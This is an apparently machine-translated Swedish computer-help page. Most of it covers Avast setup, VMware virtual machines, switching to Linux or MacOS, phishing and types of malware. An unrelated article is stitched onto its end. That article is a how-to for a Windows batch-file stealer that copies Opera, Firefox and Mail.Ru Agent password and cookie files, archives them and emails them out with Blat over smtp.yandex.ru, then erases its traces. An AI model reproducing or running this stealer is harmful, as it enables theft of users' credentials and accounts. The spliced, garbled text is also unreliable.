Datorkunskap, hjälp och reparation

Virus kan stjäla lösenord från din dator. Viruset stjäl lösenord från VKontakte och Odnoklassniki! Försiktigt! Söker efter virus

För att inte bli ett offer måste du hålla Internet säkert och göra nödvändiga ansträngningar för att skydda din dator!

I den här artikeln, eller snarare, instruktionerna kommer att uttryckas, jag, Vladimir Belev (tidigare anställd vid Moscow Instrument-Making College som tekniker, ingenjör och lärare), kommer att berätta om 3 enkla möjliga alternativ för att skydda en dator genom att en vanlig användare och kommer att svara så långt som möjligt på alla dina frågor i kommentarerna i slutet av artikeln.

När du vet var du ska lägga fjäderbädden är det bättre att lägga den!

Snabb navigering genom artikeln

Introduktion

När du surfar på Internet från en dator kan du stöta på sådana fenomen som datorinfektion med olika skadliga program, vilket kan leda till helt andra konsekvenser, från filkorruption och störningar av normala, stabil drift operativ system, tills det fullständiga felet i systemet och till och med stöld av viktiga personuppgifter!

Och till och med, förutom att direkt infektera en dator, kan du helt enkelt bli ett offer för bedragare som kan stjäla dina mycket viktiga data, såsom inloggningar och lösenord från olika webbplatser, samt information om din bankkort ah och all annan information, vars förlust kan resultera i plötsliga debiteringar av pengar från dina konton.

Därför, när du arbetar på Internet, måste du för det första vara extremt försiktig, försök att inte besöka misstänkta och farliga webbplatser och även använda skyddsverktyg för din dator.

Nedan kommer jag att visa och berätta vilka alternativ du har att skydda dig från annan sort hot när du surfar på Internet från din dator...

Alternativ nummer 1. Använd enkelt antivirusskydd (när du använder Windows)

Detta är kanske den mest relevanta, enkla och vanliga metoden för att skydda din dator från olika hot på Internet, inklusive vissa konfigurationer av antivirusprodukter, jag har även i min arsenal skyddet av dina personuppgifter och ytterligare skydd vid betalningar på Internet .

Antivirus, såväl som olika antispionprogram, antitrojaner och andra verktyg från samma kategori, kan betalas och gratis och utvecklas, naturligtvis, olika tillverkare. I mitt eget skinn upplevde jag båda, och med erfarenhetens tillväxt, med övning och olika experiment, kom jag till den otvetydiga slutsatsen att gratis antivirus fullt ut kan ge ett anständigt datorskydd.

Och när ska man välja betald och när gratis antivirus? Mitt svar är att det är lättare att använda gratis.

Betalda antivirus skiljer sig för det mesta endast i närvaro av ett stort antal ytterligare funktioner, till exempel en säker lagring för lösenord, ett inbyggt program för rengöring av en dator, en webbläsare, för uppdatering installerad på en dator programvara. Ytterligare skyddselement kan också byggas in där, till exempel en brandvägg, som skyddar din dator från olika hackerattacker och i allmänhet låter dig blockera åtkomst till Internet för vissa program och enligt vissa regler.

Men allt detta, om det behövs, kan hittas separat i gratisalternativ, och jag tror att det helt enkelt inte finns något behov av att betala för det.

Hittills har jag nöjt mig med det kostnadsfria antivirusprogrammet Avast, som jag har använt i mer än 4 år i rad.

Under dessa 4 år har jag aldrig fått någon allvarlig infektion från Internet, vilket skulle leda till till och med mindre problem i driften av mitt system och de program som är installerade på det. Naturligtvis är allt detta inte utan att ta hänsyn till en så enkel sak som en allmänt noggrann "vandring" genom webbplatserna, utan att klicka på länkar i misstänkta e-postmeddelanden, utan att ange olika data på misstänkta och opålitliga webbplatser, i allmänhet, utan att besöka webbplatser som inte alls inger förtroende!

Nedan kommer jag att visa dig hur du installerar och konfigurerar för att arbeta med en hög grad skydd gratis version av Avast antivirus.

Moderna versioner av Windows har redan standardvirusskydd som kallas "Windows Defender", men för ökad säkerhet, särskilt för nybörjare, skulle jag fortfarande rekommendera att använda ett antivirus från tredje part (när du installerar det stängs standardskyddet av av sig självt) .

Installera ett antivirusprogram

Du kan ladda ner antivirusprogrammet från den officiella webbplatsen på länken:

På sidan klickar du på knappen "Ladda ner gratis antivirus" (det kan kallas lite annorlunda).

Om detta inte händer kan du omdirigeras till en annan sida där du måste bekräfta nedladdningen eller välja version av antivirusprogrammet (gratis eller betald).

Kör den nedladdade filen för att starta installationen.

Klicka inte på installationsknappen direkt, utan klicka på "Inställningar"!

Nu måste du välja de antiviruskomponenter som ska installeras.

I bilden nedan, inringade i gult, är de viktigaste och obligatoriska komponenterna i antivirusprogrammet som direkt skyddar din dator (kontrollera filer på din dator, filer som laddats ner från Internet, e-post och analysera beteendet i systemet för misstänkta handlingar i verkligheten tid). Avmarkera inte dessa rutor!

Allt annat kan ställas in som i samma bild ovan. Jag skulle rekommendera just en sådan uppsättning komponenter, eftersom en del av resten är värdelösa, och den andra delen kommer inte att fungera gratis version antivirus. Eller så kan du inaktivera något som du anser vara onödigt för dig själv.

Du kan läsa vilken komponent som används till vad genom att föra musen över frågetecknet bredvid den önskade komponenten.

Klicka på "Installera".

När installationen är klar klickar du på "Fortsätt" flera gånger i olika fönster.

I det sista fönstret efter installationen kommer du att uppmanas att installera antivirusprogrammet på din Android-smarttelefon eller surfplatta. Du kan alltid göra detta direkt från själva enheten, eller så kan du installera den direkt, genom det här fönstret.

För att välja bort, klicka på "Nej, jag vill inte" nedan.

Kom ihåg att alla antivirus, särskilt på en smartphone, är en extra belastning på den (det kan börja sakta ner enheten), och batteriladdningshastigheten ökar också! Av min erfarenhet kan jag säga att det inte är så lätt att fånga ett virus på Android, det är mycket svårare än på Windows, om du inte besöker farliga webbplatser och under hela tiden du använder smartphones med Android OS, har jag aldrig infekterats, vilket leder till haveri eller instabilitetsenheter.

Detta avslutar installationen!

Gratis licensaktivering

Efter att du har installerat antivirusprogrammet är det bättre att omedelbart aktivera din gratislicens, för efter 30 dagar kan antivirusprogrammet börja signalera dig om utgångsdatumet. Irriterande varningar kommer att dyka upp och snart kan antivirusprogrammet stängas av helt. Aktivering är dock en fråga om minuter och ett abonnemang ges omedelbart under ett år, därefter kan det förlängas igen med ett år och så vidare i oändlighet.

Öppna antivirusprogrammets huvudfönster och klicka på "Aktivera".

Klicka på "Välj" under kolumnen " Avast gratis Antivirus” (gratis skydd).

I nästa fönster, vägra att installera testversionen av betalskydd:

Det är bara aktivering. Om aktiveringsperioden är på väg att löpa ut kommer programmet att varna dig och du behöver bara upprepa proceduren.

Antivirusinställningar

För att antivirusprogrammet ska kunna göra sitt jobb på ett tillförlitligt sätt, såväl som för att inaktivera olika onödiga "chips", rekommenderar jag att du gör några inställningar.

Öppna "Inställningar" från antivirusprogrammets huvudfönster.

Programinställningar

Detta för att förhindra att eventuell "smart" skadlig programvara börjar inaktivera ditt antivirusprogram eller hantera dess inställningar på egen hand.

Gå till undersektionen "Lösenord", slå på "Skydda Avast lösenord” och ställ in valfritt lösenord. Även den enklaste duger. Och du kan ställa in inställningarna för skyddade områden direkt som i bilden nedan:

Säkerhetsinställningar

Öppna fliken "Komponenter" och här kan du konfigurera varje skyddskomponent separat.

Inställningarna som ställs in från början kan lämnas som de är, med dem "lastar" antiviruset inte systemet mycket och skyddar samtidigt bra. Jag rekommenderar att du bara ändrar känslighetsnivån genom att ställa in den på "Hög" (först är den "normal"). För att göra detta, öppna inställningarna för varje komponent en efter en och ställ in "Hög" på fliken "Känslighet". Glöm inte att spara dina ändringar!

Det kan också komma väl till pass i inställningarna!


Söker efter virus

Oavsett hur bra antivirusprogrammet är och hur det än är rätt konfigurerat finns det alltid en chans att missa något på datorn. Därför måste du regelbundet (till exempel en gång i månaden) göra en fullständig datorsökning efter hot för att hålla ditt system i gott skick och säkrare.

För att skanna din dator Avast antivirus, gå till avsnittet "Skydd" och välj "Antivirus".

Innan du kör en fullständig datorskanning rekommenderar jag att du konfigurerar den här typen av genomsökning lite. För att göra detta, klicka på kugghjulet i hörnet av blocket med denna typ av skanning.

I avsnittet "Skanning" - "Filtyper" markerar du kryssrutan "Skanna alla filer" så att genomsökningen blir så grundlig som möjligt (men kommer att ta längre tid).

I avsnittet "Känslighet", ställ in känsligheten på hög och aktivera alternativet "Skanna hela filer".

Markera "Alla arkiverare" i avsnittet "Arkiver".

Alternativ nummer 2. Arbeta helt eller delvis via en virtuell maskin (när du använder Windows)

Denna skyddsmetod är som följer. Ett speciellt program är installerat på din dator, genom vilket du installerar ett nytt operativsystem (vad du vill) och kan arbeta i det medan du är i ditt riktiga system.

Detta operativsystem, som kommer att fungera för dig igenom specialprogram och det finns en virtuell maskin, dvs som en virtuell dator.

Vad ger det? En virtuell maskin är en separat miljö från ditt riktiga system, och om virus kommer dit kommer de att förbli där utan att skada ditt riktiga system.

En virtuell maskin (kallad "virtuell maskin") kräver bra prestanda från din dator. Enkelt uttryckt måste datorn vara kraftfull! Mycket beror förstås också på vilket system du ska installera som en virtuell maskin, eftersom till exempel Windows XP kräver flera gånger mindre datorresurser än modernt Windows 10. Är datorn svag kommer du inte att kunna arbeta normalt i en virtuell maskin, så ditt riktiga system kan sakta ner och inte klara av vissa vardagliga uppgifter.

Vilken typ av dator behöver du ha för att fungera med en virtuell maskin? Ibland är det lättare att bara ta det och kolla upp det. De där. installera en virtuell maskin, tilldela det nödvändiga beloppet för den random access minne och se om det är normalt att arbeta i det eller obekvämt. Processorn är bättre att ha från Core i line eller liknande från AMD. RAM från 4 GB, eftersom även redan gamla Windows 7 kräver 2 GB för normal drift. minne. Följaktligen, om du har totalt mindre än 4 GB på din dator. RAM, du kan glömma den virtuella maskinen).

Baserat på ovanstående kan du använda en virtuell maskin i två alternativ:

    Utför de flesta av dina handlingar i det, d.v.s. "gå" på Internet, ladda ner något.

    Utför bara vissa åtgärder i den virtuella maskinen, till exempel besök webbplatser som du inte är säker på, ladda ner filer som du inte är säker på eller installera alla möjliga okända program.

Jag skulle inte använda den första metoden, eftersom det helt enkelt är obekvämt att spendera större delen av tiden i en virtuell maskin. Och för det andra, för bekvämt arbete i en virtuell maskin (precis som i ett konventionellt system), behöver du en mycket kraftfull dator, och detta är utan att ta hänsyn till det faktum att vissa uppgifter kan utföras parallellt i ett riktigt system.

Installera VMware Workstation Player för att skapa och arbeta med virtuella maskiner

VMware Workstation Player-programmet för att arbeta med virtuella maskiner kommer endast att köras på datorer med en 64-bitarsversion av Windows! Nu, i de allra flesta fall, är den här versionen av Windows installerad på datorer. I alla fall kan du bara försöka installera.

Du kan ladda ner programmet från den officiella webbplatsen genom att klicka på länken:

På sidan som öppnas klickar du på knappen "Ladda ner" bredvid versionen för Windows (för Windows 64-bitars operativsystem) så kommer programmet att laddas ner till din dator.

När installationsfilen har laddats ner, kör den.

Klicka på Nästa i det första installationsfönstret.

I ett av installationsstegen, markera rutan "Enhanced Keybourd Driver" och klicka på "Next":

Att aktivera det här alternativet innebär att den utökade tangentbordsdrivrutinen kommer att installeras för virtuella maskiner och det är bättre att installera den för säkerhets skull.

I ett av installationsfönstren, avmarkera alternativet "Help Improve VMWare Workstation 12 Player" och lämna det första alternativet aktiverat:

Det första alternativet innebär att programmet automatiskt söker efter uppdateringar och om det finns en ny version, då kan du omedelbart uppgradera till det. Det andra alternativet är att hjälpa utvecklarna av programmet genom att skicka anonym information om hur programmet fungerar från din dator.

Allt, installationen är klar.

Kör nu programmet och du kommer att se följande fönster:

Här måste du välja den första posten, som i bilden ovan, och ange din e-postadress. Detta är bara nödvändigt för att du ska kunna använda programmet gratis. När du har angett din e-post, klicka på "Fortsätt".

I nästa fönster klickar du på "Slutför":

Programfönstret öppnas.

Skapa en virtuell maskin

Nu i programmets huvudfönster, klicka på "Skapa en ny virtuell maskin" för att skapa en ny virtuell maskin:

Så vi har nått det stadium där du behöver välja varifrån, från vilken fil eller disk operativsystemet ska installeras som ett virtuellt. Det kommer att finnas två alternativ i fönstret: installera från en CD/DVD-skiva (installationsskiva) eller installera från en avbildsfil som är lagrad på din dator (installationsskivaavbildsfil). Välj det första alternativet om du har din egen CD/DVD-skiva med ett operativsystem som du vill installera som ett virtuellt:

Du har till exempel en disk med Windows 7 och vill installera det här systemet som ett virtuellt. Sätt sedan in disken med detta system i datorn och välj det första alternativet.

Men operativsystem för installation kan också lagras i en speciell fil på din dator som kallas en "image". Sedan kan du installera operativsystemet som en virtuell maskin direkt från den här filen. Här är ett exempel på en bildfil med operativsystemet Windows XP:

VMWare Workstation Player stöder ".ISO"-bildfiler, så om du har en iso-bild med operativsystemet, då är det enklast att installera en virtuell maskin från det. Och välj sedan det andra alternativet i det aktuella fönstret:

Med hjälp av "Bläddra"-knappen kan du bara välja önskad bildfil med operativsystemet.

När du har valt det alternativ du vill ha, klicka på knappen "Nästa" nedan.

Alla operativsystem kan installeras som ett virtuellt; vilket Windows-system som helst, vilket Linux som helst!

Jag rekommenderar att du installerar Windows 7, eftersom till exempel det äldsta Windows XP inte längre stöds och många program kanske inte fungerar korrekt i det, och många kommer inte att fungera alls. Och nyare (Windows 8 och 10) kräver mer prestanda från din dator för att fungera korrekt.

I nästa fönster uppmanas vi att i förväg ange nyckeln för att installera operativsystemet, ange användarnamn och lösenord:

När allt kommer omkring kommer installationen av ett operativsystem i en virtuell maskin inte att skilja sig från att installera ett riktigt operativsystem på din dator. Den enda skillnaden är att systemet kommer att installeras i fönstret virtuellt, och inte på din riktiga HDD. Men i det fönstret rekommenderar jag att du bara lämnar användarnamnet, som sannolikt kommer att ställas in automatiskt (taget från ditt riktiga operativsystem). Nyckeln och andra parametrar, om nödvändigt, är lättare att specificera redan under installationen av operativsystemet. Därför, i det fönstret, klicka bara på "Nästa" för att fortsätta.

Du kommer förmodligen att se ett varningsfönster om att du inte angav en nyckel. Klicka på "Ja":

I nästa fönster, i det första fältet, måste du ange namnet på den virtuella maskinen som du skapar, och i det andra fältet, platsen för de virtuella maskinfilerna på din dator.

Du kan kalla det vad du vill, vanligtvis kallar de det namnet på operativsystemet som du ska installera. Huvudsaken är att du själv förstår var ditt OS är, om du plötsligt installerar och arbetar med flera virtuella OS i framtiden. De där. kalla det inte så här: "1234", för då förstår du inte själv vilken typ av virtuell maskin du har med det namnet förrän du startar den.

Du kan välja vilken plats som helst för den virtuella maskinen på din dator, det vill säga vilken mapp eller enhet som helst i ditt riktiga system. Det är i den valda mappen som filerna (det kommer att finnas många) som är ansvariga för att starta den virtuella maskinen kommer att finnas.

Observera att den virtuella maskinen tar mycket plats! Beror på systemet som installeras.

När du anger namn och plats klickar du på "Nästa".

I nästa fönster måste du ange volymen på din hårddisk, som kommer att tilldelas för arbetet med den skapade virtuella maskinen. Detta är ett mycket viktigt steg!

Som jag sa, en virtuell maskin skiljer sig praktiskt taget inte från ditt riktiga operativsystem. Hon kommer också att ha en egen hårddisk endast virtuell.

Och volymen på hårddisken i det virtuella operativsystemet kommer att vara lika med volymen på din riktiga hårddisk som du allokerar för den virtuella maskinen.

Allt här kommer att bero på vilket operativsystem du installerar som ett virtuellt. Om till exempel Windows XP, så kräver det inte mycket hårddiskutrymme och cirka 10-15 GB räcker för det.

Men moderna Windows OS: 7, 8, 10 kräver en anständig mängd ledigt diskutrymme för sitt arbete, minst 30 GB, och bättre - mer (beroende på vad den virtuella maskinen ska användas till).

Och i det första fältet i det aktuella fönstret måste du ange hur mycket av din riktiga hårddisk du kommer att allokera för den skapade virtuella maskinen.

Jag, som jag redan sa, till exempel, jag kommer att installera en provversion 30-dagars Windows version xp. För detta system räcker 15 GB. virtuell diskstorlek.

Observera att din riktiga hårddisk bör ha minst lika mycket ledigt utrymme som du avsätter för den virtuella maskinen!

Genom att markera det alternativet indikerade vi att det inte är nödvändigt att dela upp den virtuella hårddisken på vilken det virtuella operativsystemet kommer att köras på flera filer, låt det vara i en fil. Om vi ​​valde det andra alternativet "Dela virtuell disk i flera filer", så skulle den virtuella hårddisken delas upp i flera filer.

I nästa fönster kommer du att få information om inställningarna för den skapade virtuella maskinen. Vi kan klicka på "Slutför" just nu för att starta installationen av den virtuella maskinen, men vi kommer inte att göra detta nu.

Låt oss gå vidare till ytterligare inställningar virtuell maskin för att förstå en annan extremt viktig inställning och klicka på knappen "Anpassa hårdvara" för detta:

Ett ytterligare fönster öppnas med inställningar på flera flikar. Vi är bara intresserade av fliken "Minne", som anger mängden RAM som allokeras till den virtuella maskinen på din dator.

I det här fönstret måste du ange mängden av ditt riktiga RAM-minne som kommer att tilldelas för driften av den virtuella maskinen.

Allt beror återigen på vilket operativsystem du ska installera. Om detta är Windows XP kommer det att kunna fungera med endast 128 MB minne, även om det kommer att sakta ner mycket.

Det är bättre för henne att tilldela 1-2 GB. BAGGE. Om du installerar Windows 7, 8 eller 10 som en virtuell maskin rekommenderar jag att du tilldelar minst 2 GB. random access minne.

Men det finns en poäng till. Om din dator redan har lite RAM, så kan du inte allokera mycket för det virtuella systemet!

Om datorn bara har 2 GB minne (en sådan dator är mycket svag idag) kommer du sannolikt inte att tilldela mer än 512 MB (megabyte) minne för den virtuella maskinen, för om du allokerar mer kan ditt huvudsystem starta att sakta ner hårt. Tänk på detta!

I allmänhet, om din dator är svag, är det lättare att inte bry sig med virtuella maskiner.

Du kommer tillbaka till fönstret med information om hur du ställer in din virtuella maskin och det är dags att fortsätta direkt till installationen av den virtuella maskinen!

Kontrollera att kryssrutan "Slå på den här virtuella maskinen efter skapande" är markerad så att installationen startar omedelbart och klicka på "Slutför":

Installationen av det virtuella operativsystemet du konfigurerade startar. Först visas fönster som meddelar dig att en del av din riktiga datorhårdvara är ansluten till den virtuella maskinen, samt fönster med olika icke-väsentlig information. Markera bara rutan "Visa inte detta tips igen" i dessa fönster och klicka på "OK":

Tja, då kommer installationen av det virtuella operativsystemet att gå direkt. I Windows XP-exemplet ser det ut så här:

Att installera ett system som en virtuell maskin skiljer sig inte från den faktiska processen att installera detta system på en dator.

Efter att ha installerat operativsystemet som ett virtuellt kommer det att starta omedelbart. Det hela ser ut ungefär så här (dvs operativsystemet i VMWare-programfönstret):

Omedelbart efter att systemet har startat startar installationen av ytterligare verktyg automatiskt i det. Detta är nödvändigt i första hand så att du enkelt kan dra och släppa filer från det verkliga systemet till det virtuella OS-fönstret eller vice versa, och även fritt kunna ändra storlek på fönstret med den virtuella maskinen.

Viktiga nyanser för att arbeta med virtuella maskiner


Alternativ nummer 3. Använd för arbete (permanent) ett av operativsystemen Linux eller MacOS

Förutom de mest populära Windows-operativsystemen i världen finns det analoger. De mest populära analogerna är Linux- och MacOS-system.

Linux är ett gratis operativsystem som alla fritt kan ladda ner från Internet och installera på sin dator.

MacOS är fabriksoperativsystemet på alla Apple-datorer (Macbook).

En mycket viktig funktion förenar båda dessa system - de är mycket säkrare än vanliga Windows. Det är därför jag tillskrev arbetet i dessa system till det 3:e alternativet för säkert arbete på en dator.

Om du arbetar på Linux eller MacOS behöver du inte ens använda antivirus! Det finns definitivt en risk för infektion, men den är minimal Windows jämförelse, särskilt eftersom de allra flesta olika virus, trojaner och andra hot är utvecklade för datorer med ett Windows-system, och om dessa filer kommer på Linux eller MacOS kommer de helt enkelt att vara ofarliga.

Ska jag byta till Linux eller stanna på Windows?

Det är upp till dig att bestämma! Men jag kan säga att det här är fundamentalt olika system, liknar Windows bara i vissa funktioner och inget mer. De har ett helt annat gränssnitt; många andra program som inte finns i Windows och finns i dessa system (och vice versa); för vissa program måste du leta efter analoger (det finns till exempel ingen Adobe Photoshop för Linux); i allmänhet är de helt olika i systemets struktur.

Därför, om du är nybörjare, med en dator som inte riktigt är på "Du", men redan har anpassat dig till att arbeta i Windows, kan en fullständig övergång till Linux eller MacOS vara ett verkligt problem för dig. För erfarna användare, men som bara har arbetat på Windows i många år, kan övergången till Linux på intet sätt klara sig utan nyanser, många frågor och missförstånd av vissa saker.

I det här fallet är det förmodligen lättare för dig att arbeta på Windows, genom att tillämpa de säkerhetsåtgärder som beskrivs i den här handboken. Dessutom kommer Linux och MacOS inte att vara helt skyddade mot stöld av personlig information, såsom lösenord från webbplatser, bankkort och kontodata, även om man tar hänsyn till deras säkerhet mot virushot.

Eftersom användarna själva är skyldiga till stöld av data, på grund av deras oerfarenhet, ouppmärksamhet, eftersom det räcker att av misstag gå in på en icke-falsk sida, ange ett användarnamn och lösenord där (tror att du går in på den välbekanta webbplatsen du behöver ) och det är allt, angriparna har data! Detta är bara ett exempel på hur data kan stjälas på grund av användarens slarv.

Påminnelse! Vi får inte glömma

Det är viktigt att veta att oavsett vilket skydd du använder när du arbetar på en dator för att skydda dig från virus som bryter systemet och personuppgifter, från stöld av viktig data, från hackning och allt annat, kommer du inte att kunna säkerställa 100 % säker surfning på Internet om du utsätter dig själv för risker på grund av oerfarenhet, okunnighet, ouppmärksamhet.

Det enklaste exemplet. Någon på internet bad dig att återställa ditt lösenord. E-post och du, litar på personen, skickar. Då disponerar den här personen din post som han vill, han vill radera alla brev eller göra otäcka saker för din räkning. Vad kommer skyddet som du använder för att arbeta på Internet att göra i det här fallet? Ingenting alls!

Oavsett om det är det mest avancerade antivirusprogrammet, en virtuell maskin eller att arbeta i en säker Linux-system eller annat system. Allt detta kommer inte att hjälpa på något sätt, för i det här fallet överförde du själv dina data till angriparen och detta händer hela tiden, som regel, på grund av överdrivet förtroende, på grund av användarnas oerfarenhet och ouppmärksamhet.

Jag kommer att ge ett exempel på användarens ouppmärksamhet, vilket leder till stöld av personuppgifter.

Anta att du vill logga in på ditt VKontakte sociala nätverkskonto. Det verkar gå till platsen för detta sociala nätverk som vanligt, men du uppmärksammar inte ens det faktum att adressen till webbplatsen skiljer sig något från den riktiga.

Den ursprungliga adressen till detta sociala nätverk är vk.com, och du kom till webbplatsen vc.com, som till exempel har exakt samma design som VKontakte-webbplatsen.

Så, genom att gå till denna falska, bedrägliga webbplats, ägnar du dig ingen uppmärksamhet åt någonting, ange ditt användarnamn och lösenord för att komma in på ditt konto. Och så oj! Dina uppgifter, nämligen din inloggning och lösenord, kommer redan att finnas i händerna på angripare! Och allt varför? Enkel ouppmärksamhet, förmodligen oerfarenhet. I det här fallet, återigen, kommer inget skydd att hjälpa. Antivirus kan givetvis varna för en nätfiskesida, men inte alltid, eftersom denna falska sida kunde ha dykt upp häromdagen och helt enkelt inte kommit in i databasen än.

Och det finns många sådana exempel...

Gå därför på Internet, var alltid uppmärksam, uppmärksam och försiktig. Här är några rekommendationer.

Faktiskt behandla virus, detta är inte en mycket komplicerad operation för att betala specialister mycket pengar för detta arbete. Du kan skydda din dator från virus, eller, i händelse av infektion, återställa datorn till ett "hälsosamt" tillstånd genom att ta bort skadlig programvara, genom att välja ett bra antivirusprogram och följa några regler. Ta minst två av de viktigaste: Först, uppdatera antivirusdatabaserna regelbundet. Den andra är att helt skanna din dator efter virus en gång i månaden.

Så med detta tror jag att det är klart att borttagning av skadlig programvara utförs med hjälp av antivirus. De är betalda och gratis, jag pratade om gratismetoder i följande artikel:

Och nu om vad är ett skadligt program eller på annat sätt ett virus?

Datavirus eller skadlig kodär ett program vars huvudsakliga syfte är att skada en dator, skada användardata, stjäla eller radera personlig information, försämra datorns prestanda och mycket mer.

Hittills skadlig programvara kan klassificeras i flera typer efter deras inverkan på datorn.

  • klassiska virus.
  • Trojanska program.
  • Spioner.
  • Rootkits.
  • adware.

Låt oss ta en närmare titt på varje typ av skadlig programvara.

Klassiska virusär skadliga program som kan infektera en dator, till exempel via Internet. Och kärnan i sådana virus ligger i självreplikation. Sådana virus kopierar sig själva, kopierar filer och mappar som finns på den infekterade datorn. De gör detta för att infektera data så att deras återställning i framtiden skulle vara omöjlig. Detta virus försöker skada all data på datorn genom att lägga in dess kod i alla filer, från systemfiler till användarens personliga data. Oftast är frälsning, på en sådan infekterad dator.

Trojanär en allvarlig typ av virus. Trojaner skrivs av angripare för ett specifikt syfte, till exempel att stjäla information från datorer eller stjäla lösenord och så vidare.

Trojanen är uppdelad i två delar. Den första delen, som kallas servern, lagras av angriparen och den andra, klientdelen, distribueras till alla möjliga hörn av Internet och på andra platser. Om klientdelen av det skadliga programmet hamnar på en dator, blir den här datorn infekterad och trojanen börjar skicka olika information till angriparen i förklädnad på sin server.

Dessutom kan en trojan utföra olika operationer på en dator på begäran av en server (en angripare), stjäla lösenord och infektera dokument och filer med skadlig kod.

spioner, liknar något Trojaner. Men de har den största skillnaden och den ligger i det faktum att spioner inte skadar systemet och användarfilerna. Spionprogram lugnt slå sig ner på datorn och spionera. De kan stjäla lösenord eller till och med spara absolut allt du anger från tangentbordet.

Spionprogram är den mest intelligenta typen av virus och kan till och med skicka filer från en infekterad dator. Spionen känner till mycket information om den infekterade datorn: vilket system som är installerat, vilket antivirus du använder, vilken webbläsare du använder på Internet, vilka program som är installerade på datorn och så vidare. Spionprogram är en av de farligaste skadliga programmen.

rootkits De är inte virus i och för sig. Men rootkits är program vars syfte är att dölja förekomsten av andra virus på datorn. Till exempel infekterades en dator med ett spionvirus samtidigt som ett rootkit. Och rootkit kommer att försöka dölja en spion från ditt antivirus- och operativsystem. Följaktligen är närvaron av rootkits på en dator inte mindre farlig, eftersom de kan fungera ganska bra och dölja en massa virus (spionprogram, trojaner) från ögonen på vårt antivirus under en lång tid!

Reklamprogramär en annan typ av skadlig programvara. Detta är ett mindre farligt program, och dess kärna är att visa annonser på din dator på alla möjliga sätt på olika platser. Adware orsakar ingen skada och infekterar eller korrumperar inte filer. Men du måste också skydda dig mot den här typen av virus.

Dessa är typerna skadlig programvara existera. För att skydda din dator från virus behöver vi bra antivirus. Jag pratade om det i en annan artikel, och nu kommer vi att fortsätta med att beskriva virus och skyddssystem för vår dator.

Tidigare hade virus inte något specifikt syfte, de skrevs för intressets skull och utvecklaren satte inte upp ett specifikt mål. Nu är virus de mest komplexa algoritmerna, vars kärna oftast är stöld av pengar och data. Trojaner är oftast endast utformade för att stjäla lösenord och annan viktig data.

Förresten, om din dator attackerades av virus kan särskiljas av några funktioner:

  • Program fungerar inte korrekt eller slutar fungera helt.
  • Datorn började sakta ner, arbeta långsamt.
  • Vissa filer blir skadade, vägrar att öppna.

Mycket ofta kan dessa symtom bli ett tecken på en datavirusinfektion men som tur är inte alltid.

Du bör vara uppmärksam på att ett visst virus oftast kan infektera olika typer av filer. Därför, även efter att ha botat datorn från en stark virusattack, kommer partitionsformateringen att vara den mest korrekta.

För att skydda dig mot virus, som jag sa ovan, kommer antivirusprogram att hjälpa dig. Idag har antivirusprogram funktioner som räcker för att återspegla nästan alla skadliga program som distribueras på Internet. Men för max virus skydd en viktig roll spelas av ett korrekt utvalt och konfigurerat antivirusprogram för full "kamp"-prestanda. Jag rekommenderar att du läser artikeln om. Men om du inte har tid, då kommer jag att utse dig de bästa antivirusprogrammen här. Från och med idag är dessa:

  • Kaspersky
  • Avast
  • Dr. Web
  • NOD32

Jag tror att det finns massor att välja på.

Lycka till och utmärkt virusskydd till dig.

I den här artikeln kommer jag att beskriva hur snabbt och utan större svårigheter, skriver och gör ett virus som stjäl filer med lösenord och skickar allt till brevlådan.
Låt oss börja med det faktum att viruset kommer att skrivas i bat "e (CMD, du kan ta de grundläggande kommandona) det vill säga i en vanlig textfil och kommer att köras med den standardinbyggda Windows "kommandoradstolken" .
För att skriva ett sådant virus måste du känna till den exakta lagringsplatsen för de filer som det kommer att stjäla, Blat-komponenter som kan laddas ner från den andra sidan http://www.blat.net/ eller från vår server, som samt en komponent från WinRaR-arkivet Rar.exe (du klarar dig utan den).
Öppna anteckningsblock och kopiera följande kod till den:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r kopiera /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" kopiera /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" kopiera /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite kopia /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Lösenord ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe AVSLUTA cls

Jag kommer inte att skriva mycket av koden för själva Batinka.
@echo off - döljer rumpans kropp (så det behövs inte, men ändå)
md %systemroot%\wincs - skapar en wincs-mapp i systemet Windows-mappen oavsett vilken enhet den är installerad på eller vad den heter.
md %SystemDrive%\pass\ - skapar en passmapp på enheten där Windows är installerat.
md %SystemDrive%\pass\opera\ - skapar operamappen där wand.dat och cookies4.dat kommer från Opera webbläsare(upp till 11* versioner, opera lagrar sina lösenord i wand.dat-filen)
md %SystemDrive%\pass\Mozilla\- skapar en Mozilla-mapp där filer från Mozilla-webbläsaren kommer att kopieras (cookies.sqlite ,key3.db ,signons.sqlite ) där lösenorden lagras.
